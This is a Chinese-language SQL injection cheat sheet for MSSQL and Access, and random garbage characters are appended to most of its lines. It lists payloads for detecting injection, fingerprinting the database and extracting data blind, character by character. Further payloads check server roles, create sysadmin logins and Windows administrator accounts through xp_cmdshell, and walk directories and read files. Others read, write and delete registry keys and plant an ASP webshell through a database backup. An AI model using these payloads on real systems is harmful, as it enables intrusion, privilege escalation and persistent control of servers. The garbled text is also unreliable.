1.判断是否有注入;and 1=1 ;and 1=2 o��2&mh��T
2.初步判断是否是mssql ;and user>0 ~kF^�0-JZY
$1/yc#w
u
3.注入参数是字符'and [查询条件] and ''=' �J4=~��.&6
%~G)xK?W*�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' {QJ�Jw}!#�
�td{$��c�6
5.判断数据库系统 [�&��"`2�n
SmC��91�XO
;and (select count(*) from sysobjects)>0 mssql kOeW,:&65�
Et�Ky�?]i�
;and (select count(*) from msysobjects)>0 access M/�>^_z��G
)g+~"&G�cx
�1@�;D�n�'
�"){��"{~
6.猜数据库 ;and (select Count(*) from [数据库名])>0 P;][i|���x
�T[q2quXgk
7.猜字段 ;and (select Count(字段名) from 数据库名)>0
qN�[U|3k
08c�C��r�G
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ioz4�k�G�!
��r m�\]
9.(1)猜字段的ascii值(access) UJ�
n3sZ<}
�P�kMN�@JS
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 `�Z0FQ( r_
�sYYN�T��*
(2)猜字段的ascii值(mssql) "!� �m6U#^
$CRu?WUS]'
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 l*":WzRGvF
g-Vxl|h�R�
10.测试权限结构(mssql) h b_"E, `F
Y'mtML�fMc
&�M&*3����
MA6(�VII��
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- )�pb�svR_
nD{��o8��;
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- :[kfWai�#(
�GO2�mccIB
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �#I�pi��3
Vo��"�Wr>F
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 8,7^@[bzXx
Y;-$w|&P�>
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �~l+2Z4nV�
+0�_e �a~{
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ]{s0�/(E�A
TD!--l*gL�
;and 1=(select IS_MEMBER('db_owner'));-- S�YkwM���6
s'b �4�M�e
Y 3h`��uLQ
_�(�l?�g�j
11.添加mssql和系统的帐户 L7;8:^�� v
m�}�h�E�i�
;exec master.dbo.sp_addlogin username;-- ^C�O{86��V
;exec master.dbo.sp_password null,username,password;-- �c#(�Hh{0�
XXPn)kmWR
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- v�hIZkz!�9
m Q�4(<,F�
;exec master.dbo.xp_cmdshell 'net user username password ~t^
Umx"Ew
�1o`zAJ8|2
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
�4A��"3C�
``4e�&����
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ;x%"�o[�[>
S�O4?3wg7�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �E�M�QGP<[
\�Kr8k��`f
2�*�Z�k^h=
G%i�T��L"6
12.(1)遍历目录 )Fon�;/p�
,4:=n$e 0�
;create table dirs(paths varchar(100), id int) n&OM~���Vs
�'.EO+�1{a
;insert dirs exec master.dbo.xp_dirtree 'c:\' %�
b�fe_k(
�d^�M�Ru#]
;and (select top 1 paths from dirs)>0 ��'b�)qP|�
��DK)T2{�:
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) v;soJl�xF~
hh8Gr���l;
]-8WM5\qJM
3�{$�v�N).
(2)遍历目录 �}`cf3'rdk
@,Z0u2WLl6
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- <az��t�bq?
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �L"��bZ~'y
>3ax �`8�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 &��^2S�d�F
Zt�yDip'x�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 J0V�`�sK�
k�/�P�.[�5
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 *4�/FN TC
3xg��9D.A
qv�&� Bai[
Q2�/65$�nW
13.mssql中的存储过程 /�s�fJ:KP0
]�)}a�^]0q
xp_regenumvalues 注册表根键, 子键 m??P�y"1�y
G %'xE�r0n
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 L!>nl4O>`�
~8s2�p�%~�
xp_regread 根键,子键,键值名 <d�� @9[]
>-w�(�P��/
;exec xp_regread 1U%��
/~��
j�p_|pC�'
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 =�Ox}WrU~�
��>
vdmN]�
xp_regwrite 根键,子键, 值名, 值类型, 值 ]{��oZn5�F
g�k6UV2nE?
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 d]�poUN�~x
��AdVc1v&>
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �f��W��Z�(
�u��\V^g��
xp_regdeletevalue 根键,子键,值名 3�pg�=9�*{
*�,��mI�=1
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 A�HRJ7l;�a
-��Ars�m�o
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �3���P�9ux
�DY �-5(6X
3/>�7�b�(
!��!A�0K"h
14.mssql的backup创建webshell ��#F`A�(�n
t%;w<1���E
use model �2 /FQ;<L�
(J[X��ryub
create table cmd(str image); lD��THK�2f
�-Qro�T`gy
insert into cmd(str) values (''); 3V<@�Vk�f5
.4p3~�r?=S
backup database model to disk='c:\l.asp'; �A�H|g�I�2
@^A�5{q�Q\
#�ob�Rr�#8
'`3�#FCg��
15.mssql内置函数 ��@�@)2 12
1>"�-!�ADm
;and (select @@version)>0 获得Windows的版本号 !b��P%\�)5
PD�)"�od��
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �,��;_�+o]
)P$|9<_q7x
;and (select user_name())>0 爆当前系统的连接用户 tO&ffZP�8$
v8)"skVnFG
;and (select db_name())>0 得到当前连接的数据库 CuWJai:nQ;
|@v���kQ
C��Z<�T�@k
H��R�}O:2'
16.简洁的webshell D�s�ejZ�&�
l��j� �(�y
use model Ut��;`�6t�
H�w��FX,?�
create table cmd(str image); cg.{�oM�wa
`
y\)X�
C7
insert into cmd(str) values (''); �hW�~.F��
Ttt'X�<�9�
backup database model to disk='g:\wwwtest\l.asp';
